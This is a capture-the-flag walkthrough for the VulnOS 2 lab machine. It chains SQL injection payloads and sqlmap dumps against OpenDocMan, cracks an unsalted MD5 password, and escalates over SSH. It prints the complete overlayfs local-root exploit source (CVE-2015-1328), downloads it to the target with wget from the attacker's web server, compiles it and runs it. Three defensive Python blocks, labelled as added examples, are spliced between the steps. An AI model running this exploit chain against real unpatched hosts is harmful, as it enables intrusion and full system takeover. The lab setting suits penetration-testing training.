VulnHub machine walkthrough [vulnos-2]

Name

Name: VulnOS: 2
Release date: 17 May 2016

Download

VulnOSv2.7z

  • Download (Mirror): https://download.vulnhub.com/vulnos/VulnOSv2.7z
  • Download (Torrent): https://download.vulnhub.com/vulnos/VulnOSv2.7z.torrent

Description

VulnOS is a series of vulnerable operating systems packaged as virtual images to sharpen penetration testing skills.

This is version 2: smaller, less chaotic! As time is not always on my side, it took a long time to create another VulnOS, but I enjoy creating them. The image was built with VBOX. Unpack the file and add it to your virtualization software.

The assignment is to penetrate the company's website, obtain root on the system and read the final flag.

Note: the current keyboard preference is "pentesting is a wide concept". If you have any questions, feel free to contact me at m4db33f@gmail.com. Shout out to the Vulnhub testing team! Hope you enjoy it.

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.104
Host is up (0.00031s latency).
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -sV -p- -v 192.168.56.104
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
root@kali:~# nmap -p 22,80,6667 -sV -v -A -T4 --script=vuln 192.168.56.104
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.104
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.104:80/jabc/?q=node/6
| Form id: commerce-cart-add-to-cart-form-3
| Form action: /jabc/?q=node/6
|
| Path: http://192.168.56.104:80/jabc/?q=node/4
| Form id: commerce-cart-add-to-cart-form-1
| Form action: /jabc/?q=node/4
|
| Path: http://192.168.56.104:80/jabc/?q=node/5
| Form id: commerce-cart-add-to-cart-form-2
|_ Form action: /jabc/?q=node/5
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.104:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.56.104:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
6667/tcp open irc ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).

Visit the website on port 80 in a browser

http://192.168.56.104/jabc/

The site has many tabs. I went through every tab, including its page source, and found nothing except in the last tab (Documents).

Viewing the page source reveals a line mentioning "/jabd0cs/" on the server, along with a hint to simply log in with guest/guest.

So open that directory and log in with guest:guest as username:password.

There is an upload option, but it is restricted to .doc files only, so it is of little use on its own.

Looking at the login page, the CMS is OpenDocMan v1.2.7. This version of OpenDocMan is known to be vulnerable.

Search for exploits available for OpenDocMan. For this, type:

root@kali:~# searchsploit OpenDocMan 1.2.7
------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------ ----------------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities | exploits/php/webapps/32075.txt
------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

The results turn up exploit 32075.txt, which states: "The vulnerability exists due to insufficient validation of 'add_value' HTTP GET parameter in '/ajax_udf.php' script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database."

Now take a look at the exploit

root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/32075.txt
Advisory ID: HTB23202
Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user's profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>

------------------------------------------------------------------------
-----------------------

Solution:

Update to OpenDocMan v1.2.7.2

More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/

------------------------------------------------------------------------
-----------------------

References:

[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.
[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

------------------------------------------------------------------------
-----------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
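The advisory above describes a GET parameter that reaches SQL without validation. As an added example (not code from the page or from OpenDocMan), here is a log-side check a defender can run over Apache access logs: it flags ajax_udf.php requests whose add_value is not a bare identifier, which is the shape both the advisory's UNION payload and the nmap sqlspider probes take. The log lines are constructed for the demo, and the /jabcd0cs path prefix is assumed from the database name seen later on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache "combined" access-log format (the constructed sample lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# In OpenDocMan 1.2.7, ajax_udf.php's add_value names a table/column and is
# interpolated into SQL, so a legitimate value is a bare identifier.
IDENT_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")
SQL_HINT = re.compile(r"\b(union|select|or|and|sleep|benchmark)\b|['\"#;]|--|/\*", re.I)

def classify_request(target: str):
    """Return (is_suspicious, reason, decoded_add_value) for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/ajax_udf.php"):
        return False, "other path", None
    values = parse_qs(parts.query, keep_blank_values=True).get("add_value")
    if not values:
        return False, "no add_value", None
    # parse_qs already decoded once; decode again to catch double-encoded probes.
    value = unquote_plus(values[0])
    if IDENT_RE.match(value):
        return False, "identifier", value
    reason = "sql tokens" if SQL_HINT.search(value) else "non-identifier"
    return True, reason, value

def scan_log(lines):
    """Yield (ip, timestamp, reason, decoded add_value) for suspicious requests."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        flag, reason, value = classify_request(m.group("target"))
        if flag:
            yield m.group("ip"), m.group("ts"), reason, value

# Constructed sample log lines (not real traffic): the first target mirrors the
# advisory's version() payload, the second an nmap sqlspider-style probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Apr/2020:05:00:01 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 512 "-" "sqlmap/1.4"',
    '10.0.0.5 - - [20/Apr/2020:05:00:02 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%27%20OR%20sqlspider HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Apr/2020:05:00:03 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Apr/2020:05:00:04 +0200] "GET /jabc/?q=node/6 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

def detect_sample():
    """Run the detector over the constructed sample and return the hits."""
    return list(scan_log(SAMPLE_LOG))

if __name__ == "__main__":
    for ip, ts, reason, value in detect_sample():
        print(f"{ts} {ip} add_value={value!r} ({reason})")
```

The same regex-free identifier rule is what the server side should enforce: reject any add_value that is not in a whitelist of known column names before it gets near a query.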

Now use sqlmap to find the database holding usernames and passwords, as follows:

This was done with the Burp plugin that integrates with sqlmap; right-click a request to send it for injection directly.

  • Enumerate databases
D:\burpcn2.0\BurpSuite_pro_v2.1\BurpSuite_pro_v2.1>sqlmap.py -r C:\Users\HASEE\AppData\Local\Temp\\1587350985142.req --level 5 --risk 3 --dbs
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin
  • Enumerate tables
D:\burpcn2.0\BurpSuite_pro_v2.1\BurpSuite_pro_v2.1>sqlmap.py -r C:\Users\HASEE\AppData\Local\Temp\\1587350985142.req --level 5 --risk 3 -D jabcd0cs --tables
Database: jabcd0cs
[15 tables]
+-------------------+
| odm_access_log |
| odm_admin |
| odm_category |
| odm_data |
| odm_department |
| odm_dept_perms |
| odm_dept_reviewer |
| odm_filetypes |
| odm_log |
| odm_odmsys |
| odm_rights |
| odm_settings |
| odm_udf |
| odm_user |
| odm_user_perms |
+-------------------+
  • Dump usernames and password hashes
D:\burpcn2.0\BurpSuite_pro_v2.1\BurpSuite_pro_v2.1>sqlmap.py -r C:\Users\HASEE\AppData\Local\Temp\\1587350985142.req --level 5 --risk 3 -D jabcd0cs -T odm_user --dump
Database: jabcd0cs
Table: odm_user
[2 entries]
+------+-------------+--------------------+----------+-----------+------------+------------------------------------------+------------+---------------+
| id | phone | Email | username | last_name | first_name | password | department | pw_reset_code |
+------+-------------+--------------------+----------+-----------+------------+------------------------------------------+------------+---------------+
| 1 | 5555551212 | webmin@example.com | webmin | min | web | b78aae356709f8c31118ea613980954b | 2 | <blank> |
| 2 | 555 5555555 | guest@example.com | guest | guest | guest | 084e0343a0486ff05530df6c705c8bb4 (guest) | 2 | NULL |
+------+-------------+--------------------+----------+-----------+------------+------------------------------------------+------------+---------------+

Crack webmin's hash with an online lookup tool

webmin/webmin1980
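The odm_user dump shows why an online lookup works: the password column holds bare, unsalted MD5 digests, so one precomputed table serves every user on every OpenDocMan install. As an added example (not code from the page), the block below checks that property against the two dumped hashes with a tiny constructed wordlist, and then shows the hardened alternative, a salted and iterated PBKDF2 record with constant-time verification, that an application should store instead.

```python
import hashlib
import hmac
import os

# Hashes as dumped from odm_user on this box (copied from the page's sqlmap output).
DUMPED_HASHES = {
    "webmin": "b78aae356709f8c31118ea613980954b",
    "guest": "084e0343a0486ff05530df6c705c8bb4",
}

# Constructed mini wordlist for the demonstration; a real audit would use a
# leaked-password list. The page reports webmin's hash cracks to webmin1980.
WORDLIST = ["password", "guest", "webmin", "webmin1980", "jabc2016"]

def looks_like_unsalted_md5(record: str) -> bool:
    """Audit helper: 32 hex chars with no algorithm, cost or salt prefix."""
    return len(record) == 32 and all(c in "0123456789abcdef" for c in record.lower())

def crack_unsalted_md5(hash_hex: str, words):
    """Return the first word whose plain MD5 equals hash_hex, else None.

    Unsalted MD5 costs one hash per candidate and the result is reusable across
    every user and every site, which is exactly why lookup tables exist.
    """
    hash_hex = hash_hex.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == hash_hex:
            return w
    return None

# Hardened form: PBKDF2-HMAC-SHA256 from the standard library, with a fresh
# 16-byte random salt per user so equal passwords yield different records.
PBKDF2_ITERS = 600_000

def hash_password(password: str, iterations: int = PBKDF2_ITERS) -> str:
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, record: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    except (ValueError, TypeError):
        return False  # malformed record never verifies
    # Constant-time compare so timing does not leak how many bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for user, h in DUMPED_HASHES.items():
        print(user, "unsalted md5:", looks_like_unsalted_md5(h),
              "wordlist hit:", crack_unsalted_md5(h, WORDLIST))
    rec = hash_password("webmin1980")
    print(rec[:40] + "...", verify_password("webmin1980", rec), verify_password("webmin1981", rec))
```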

The password is webmin1980 and the username is webmin. Log in over SSH: open a new terminal in Kali and type:

root@kali:~# ssh webmin@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
webmin@192.168.56.104's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Apr 20 04:13:19 CEST 2020

System load: 0.15 Memory usage: 2% Processes: 57
Usage of /: 5.7% of 29.91GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Wed May 4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
$ whoami
webmin
$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

Check the kernel version to see whether it is vulnerable.

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.4 LTS
Release: 14.04
Codename: trusty

The release is 14.04, which suggests it can be exploited. Search for matching exploits:

root@kali:~# searchsploit ubuntu 14.04
------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------ ----------------------------------------
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation | exploits/linux/local/37088.c
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation | exploits/linux/local/36782.sh
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / Ce | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access | exploits/linux/local/39771.txt
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Pri | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Pri | exploits/linux/local/37293.txt
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP | exploits/linux/local/41999.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1 | exploits/linux/local/39166.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privile | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Con | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalat | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Loc | exploits/linux/local/47169.c
NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC) | exploits/linux/dos/37777.txt
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation | exploits/linux/local/41762.txt
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow | exploits/linux/local/44204.md
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation | exploits/linux/local/36820.txt
------------------------------------------------------------------------------------ ----------------------------------------

Many exploitable issues are listed; from these, pick 37292.c, the overlayfs "local privilege escalation".

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Pri | exploits/linux/local/37292.c

View the exploit

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/37292.c
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);

fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";

chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");

chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}

chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr,"spawning threads\n");

if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}

waitpid(pid, &status, 0);

}

waitpid(init, &status, 0);
return 0;
}

usleep(300000);

wait(NULL);

fprintf(stderr,"child threads done\n");

fd = open("/etc/ld.so.preload",O_WRONLY);

if(fd == -1) {
fprintf(stderr,"exploit failed\n");
exit(-1);
}

fprintf(stderr,"/etc/ld.so.preload created\n");
fprintf(stderr,"creating shared library\n");
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if(lib != 0) {
fprintf(stderr,"couldn't create dynamic library\n");
exit(-1);
}
write(fd,"/tmp/ofs-lib.so\n",16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
execl("/bin/su","su",NULL);
}

Copy the exploit over, transfer it to the target machine, then compile and run it there

root@kali:~/vulnhub/vulnos-2# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/vulnhub/vulnos-2# ls
37292.c
root@kali:~/vulnhub/vulnos-2# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.56.1 - - [19/Apr/2020 23:29:04] code 404, message File not found
192.168.56.1 - - [19/Apr/2020 23:29:04] "GET /robots.txt HTTP/1.1" 404 -
192.168.56.1 - - [19/Apr/2020 23:29:04] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [19/Apr/2020 23:29:04] code 404, message File not found
192.168.56.1 - - [19/Apr/2020 23:29:04] "GET /favicon.ico HTTP/1.1" 404 -
192.168.56.104 - - [19/Apr/2020 23:29:54] "GET /37292.c HTTP/1.1" 200 -

On the victim machine, run:

$ wget http://192.168.56.102:8000/37292.c
--2020-04-20 05:29:53-- http://192.168.56.102:8000/37292.c
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’

100%[===================================================================================>] 5,119 --.-K/s in 0s

2020-04-20 05:29:53 (895 MB/s) - ‘37292.c’ saved [5119/5119]

$ ls
37292.c
$ chmod 777 *
$ ls -la
total 16
drwxrwxrwx 2 root root 4096 Apr 20 05:29 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rwxrwxrwx 1 webmin webmin 5119 Apr 20 05:28 37292.c

Compile and run the program

$ chmod 777 *
$ ls -la
total 16
drwxrwxrwx 2 root root 4096 Apr 20 05:29 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rwxrwxrwx 1 webmin webmin 5119 Apr 20 05:28 37292.c
$ gcc 37292.c -o shell
$ ls -la
total 28
drwxrwxrwx 2 root root 4096 Apr 20 05:30 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rwxrwxrwx 1 webmin webmin 5119 Apr 20 05:28 37292.c
-rwxrwxr-x 1 webmin webmin 12193 Apr 20 05:30 shell
$ ./shell
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Root obtained and the flag captured
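The overlayfs exploit above finishes by writing "/tmp/ofs-lib.so" into /etc/ld.so.preload and chmod-ing that file 0777, which is the artifact a host check should look for. As an added example (not code from the page or the exploit), the block below audits an ld.so.preload file: it flags entries outside the system library directories, entries missing on disk, and a preload file or library that is not root-owned or is writable by others. The sample file is constructed in a temporary directory; the trusted-directory list is an assumption for a Debian/Ubuntu layout.

```python
import stat
import tempfile
from pathlib import Path

# Directories from which a preloaded library is plausible on a Debian/Ubuntu host (assumed).
TRUSTED_PREFIXES = ("/lib", "/lib32", "/lib64", "/usr/lib", "/usr/local/lib")

def _in_trusted(entry: str, trusted=TRUSTED_PREFIXES) -> bool:
    return any(entry == t or entry.startswith(t + "/") for t in trusted)

def _insecure_file(path: Path):
    """Reason string if path is not root-owned or is group/world-writable, else None."""
    st = path.lstat()
    if st.st_uid != 0:
        return f"not owned by root (uid {st.st_uid})"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"writable by others (mode {stat.S_IMODE(st.st_mode):o})"
    return None

def audit_ld_preload(preload_path="/etc/ld.so.preload", trusted=TRUSTED_PREFIXES):
    """Return (severity, message) findings for an ld.so.preload file.

    An absent file is the normal state on most hosts and yields no findings.
    """
    findings = []
    p = Path(preload_path)
    if not p.exists():
        return findings
    findings.append(("info", f"{preload_path} exists"))
    reason = _insecure_file(p)
    if reason:
        findings.append(("high", f"{preload_path} {reason}"))
    for line in p.read_text(errors="replace").splitlines():
        # ld.so reads whitespace-separated names and ignores '#' comments.
        for entry in line.split("#", 1)[0].split():
            if not _in_trusted(entry, trusted):
                findings.append(("high", f"preload entry outside trusted dirs: {entry}"))
            lib = Path(entry)
            if not lib.exists():
                findings.append(("medium", f"preload entry missing on disk: {entry}"))
                continue
            reason = _insecure_file(lib)
            if reason:
                findings.append(("high", f"preloaded library {entry} {reason}"))
    return findings

def demo_constructed():
    """Constructed ld.so.preload shaped like the one ofs.c (CVE-2015-1328) leaves behind."""
    tmp = Path(tempfile.mkdtemp())
    lib = tmp / "ofs-lib.so"
    lib.write_bytes(b"\x7fELF")          # stand-in for the compiled helper library
    preload = tmp / "ld.so.preload"
    preload.write_text(f"{lib}\n")      # the exploit writes "/tmp/ofs-lib.so\n"
    preload.chmod(0o777)                # and chmods the file to 0777
    return audit_ld_preload(str(preload))

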